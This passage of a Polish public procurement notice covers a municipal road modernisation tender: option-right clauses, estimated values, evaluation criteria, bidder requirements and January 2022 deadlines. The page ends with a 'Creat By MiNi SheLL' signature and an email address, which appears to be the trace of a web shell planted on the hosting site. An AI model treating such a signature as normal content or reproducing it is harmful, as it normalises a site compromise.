zapotrzebowaniem i posiadanymi możliwościami finansowymi. Wskazana wyżej wartość robót objętych opcją stanowi maksymalny zakres zastrzeganego prawa opcji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">71315000-9 - Usługi budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega możliwość skorzystania z prawa opcji określonego w art. 441 p.z.p. Prawo opcji oznacza, że Zamawiający zobowiązuje się zrealizować minimalny zakres zamówienia w wysokości 50% szacunkowej wartości zamówienia podstawowego na podstawie cen określonych w ofercie Wykonawcy stanowiącej załącznik do umowy, zaś zakres wartościowy objęty prawem opcji zostanie uruchomiony w zależności od potrzeb i posiadanych środków przez Zamawiającego zgodnie z następującymi zasadami:<br/>a) prawo opcji realizowane będzie na takich samych warunkach jak zamówienie podstawowe;<br/>b) zakres opcjonalny przedmiotu umowy będzie realizowany w sposób analogiczny, jak zakres podstawowy, a zakresu opcjonalnego dotyczyć będą te same kwoty, warunki i zobowiązania umowne Wykonawcy (w tym zobowiązania z tytułu gwarancji i rękojmi), co przedmiotu umowy objętego zakresem podstawowym;<br/>c) o zamiarze skorzystania z prawa opcji, Zamawiający poinformuje Wykonawcę odrębnym oświadczeniem.<br/>1. Warunkiem uruchomiania prawa opcji jest złożenie przez Zamawiającego w okresie obowiązywania umowy pisemnego oświadczenia określającego zakres konkretnych robót (zakres opcji). Realizacja (uruchomienie) opcji (zakresu opcjonalnego przedmiotu umowy) nie stanowi zmiany warunków umowy i nie wymaga zawarcia aneksu do umowy.<br/>2. Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji niniejszej umowy. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu.<br/>3. Wykonawca nie jest obowiązany do realizacji zakresu opcjonalnego w zakresie, w jakim opcja nie została uruchomiona przez Zamawiającego zgodnie z zapisami umowy, jak również Wykonawca nie może domagać się jego realizacji.<br/>4. Opcja może być realizowana przez Zamawiającego etapowo, częściowo, fragmentarycznie, sukcesywnie przy czym oświadczenie o skorzystaniu przez Zamawiającego z opcji (ewentualnie ostatnie z takich oświadczeń – w przypadku etapowego korzystania z opcji) może zostać złożone nie później niż do dnia 15.12.2022 r. Po upływie tego terminu opcja (w zakresie, w jakim nie została uruchomiona) wygasa, w związku z czym Zamawiający po upływie tego terminu nie może już z niej skorzystać.<br/>5. W momencie złożenia oświadczenia o skorzystaniu z opcji następuje zaciągnięcie przez Zamawiającego zobowiązania finansowego w wysokości wynikającej z zakresu robót budowlanych objętych realizowaną na mocy danego oświadczenia opcją.<br/>Wartość planowanych robót objętych zamówieniem podstawowym oszacowana została na kwotę 156 500,00 zł brutto. Zamawiający zobowiązuje się zrealizować minimalny zakres zamówienia w wysokości 50% szacunkowej wartości zamówienia podstawowego .<br/>Wartość planowanych robót objętych zamówieniem opcjonalnym oszacowana została na kwotę 100 000,00 zł brutto i jest to maksymalna wartość, do której Zamawiający może zrealizować zamówienie opcjonalne. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">zgodnie z zapisami SWZ i postanowieniami Pzp</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 4: Modernizacja dróg gminnych z płyt drogowych<br/>W ramach zadania należy wykonać nawierzchnie z płyt drogowych na podsypce piaskowej, z korytowaniem oraz obsługą geodezyjną. <br/>Wartość planowanych robót objętych zamówieniem podstawowym oszacowana została na kwotę 169 500,00 zł brutto. Zamawiający zobowiązuje się zrealizować minimalny zakres zamówienia w wysokości 50% szacunkowej wartości zamówienia podstawowego.<br/>Wartość planowanych robót objętych zamówieniem opcjonalnym oszacowana została na kwotę 340 000,00 zł brutto i jest to maksymalna wartość, do której Zamawiający może zrealizować zamówienie opcjonalne.<br/>Wykonawców prosi się o wycenę następujących pozycji:<br/>1)	1 m2 nawierzchni z płyt drogowych,<br/>2)	remont nawierzchni drogi z płyt drogowych – płyty z rozbiórki materiał inwestora – 1m2<br/>3)	1 m2 nawierzchni z płyt jomb<br/>4)	remont nawierzchni drogi z płyt betonowych jomb - płyty z rozbiórki materiał inwestora – 1m2<br/>5)	1 m2 wykonania koryta o głębokości 1 cm i warstwy odsączającej – za każdy kolejny 1 cm grubości,<br/>6)	1 mb nowego krawężnika betonowego z ławą z oporem.<br/>Wszystkie roboty wymienione powyżej w punktach 1) – 6) rozliczane będą powykonawczo zgodnie z bieżącym zapotrzebowaniem po cenach jednostkowych.<br/>Powyższy zakres obejmuje zarówno zakres podstawowy jak i zakres opcjonalny zamówienia. Zastrzega się, iż prawo opcji (zakres opcjonalny zamówienia) nie stanowi zobowiązania umownego (w tym finansowego) Zamawiającego zaciąganego w momencie zawarcia umowy w sprawie zamówienia, a przewidywany zakres opcjonalny zamówienia nie jest gwarantowany do realizacji. Powyżej określony zakres objęty prawem opcji przewidziany zostaje na okoliczność istnienia stosownych możliwości finansowych po stronie Zamawiającego w kontekście realizacji tego zakresu prac oraz uznania potrzeby ich wykonania (tzn. w zależności od potrzeb Zamawiającego). Zamawiający podejmie decyzję co do możliwości i woli skorzystania z zastrzeżonego prawa opcji zgodnie z zapotrzebowaniem i posiadanymi możliwościami finansowymi. Wskazana wyżej wartość robót objętych opcją stanowi maksymalny zakres zastrzeganego prawa opcji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">71315000-9 - Usługi budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega możliwość skorzystania z prawa opcji określonego w art. 441 p.z.p. Prawo opcji oznacza, że Zamawiający zobowiązuje się zrealizować minimalny zakres zamówienia w wysokości 50% szacunkowej wartości zamówienia podstawowego na podstawie cen określonych w ofercie Wykonawcy stanowiącej załącznik do umowy, zaś zakres wartościowy objęty prawem opcji zostanie uruchomiony w zależności od potrzeb i posiadanych środków przez Zamawiającego zgodnie z następującymi zasadami:<br/>a)	prawo opcji realizowane będzie na takich samych warunkach jak zamówienie podstawowe;<br/>b)	zakres opcjonalny przedmiotu umowy będzie realizowany w sposób analogiczny, jak zakres podstawowy, a zakresu opcjonalnego dotyczyć będą te same kwoty, warunki i zobowiązania umowne Wykonawcy (w tym zobowiązania z tytułu gwarancji i rękojmi), co przedmiotu umowy objętego zakresem podstawowym;<br/>c)	o zamiarze skorzystania z prawa opcji, Zamawiający poinformuje Wykonawcę odrębnym oświadczeniem.<br/>2.	Warunkiem uruchomiania prawa opcji jest złożenie przez Zamawiającego w okresie obowiązywania umowy pisemnego oświadczenia określającego zakres konkretnych robót (zakres opcji). Realizacja (uruchomienie) opcji (zakresu opcjonalnego przedmiotu umowy) nie stanowi zmiany warunków umowy i nie wymaga zawarcia aneksu do umowy.<br/>3.	Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji niniejszej umowy. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu.<br/>4.	Wykonawca nie jest obowiązany do realizacji zakresu opcjonalnego w zakresie, w jakim opcja nie została uruchomiona przez Zamawiającego zgodnie z zapisami umowy, jak również Wykonawca nie może domagać się jego realizacji. <br/>5.	Opcja może być realizowana przez Zamawiającego etapowo, częściowo, fragmentarycznie, sukcesywnie przy czym oświadczenie o skorzystaniu przez Zamawiającego z opcji (ewentualnie ostatnie z takich oświadczeń – w przypadku etapowego korzystania z opcji) może zostać złożone nie później niż do dnia 15.12.2022 r. Po upływie tego terminu opcja (w zakresie, w jakim nie została uruchomiona) wygasa, w związku z czym Zamawiający po upływie tego terminu nie może już z niej skorzystać.<br/>6.	W momencie złożenia oświadczenia o skorzystaniu z opcji następuje zaciągnięcie przez Zamawiającego zobowiązania finansowego w wysokości wynikającej z zakresu robót budowlanych objętych realizowaną na mocy danego oświadczenia opcją.<br/>Wartość planowanych robót objętych zamówieniem podstawowym oszacowana została na kwotę 169 500,00 zł brutto. Zamawiający zobowiązuje się zrealizować minimalny zakres zamówienia w wysokości 50% szacunkowej wartości zamówienia podstawowego.<br/>Wartość planowanych robót objętych zamówieniem opcjonalnym oszacowana została na kwotę 340 000,00 zł brutto i jest to maksymalna wartość, do której Zamawiający może zrealizować zamówienie opcjonalne. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">zgodnie z zapisami SWZ i postanowieniami Pzp</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>1)	Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana warunków umowy została opisana w § 15 wzoru umowy (załącznika nr 5 do SWZ) . <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gmina_kwidzyn</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-14 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-12</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com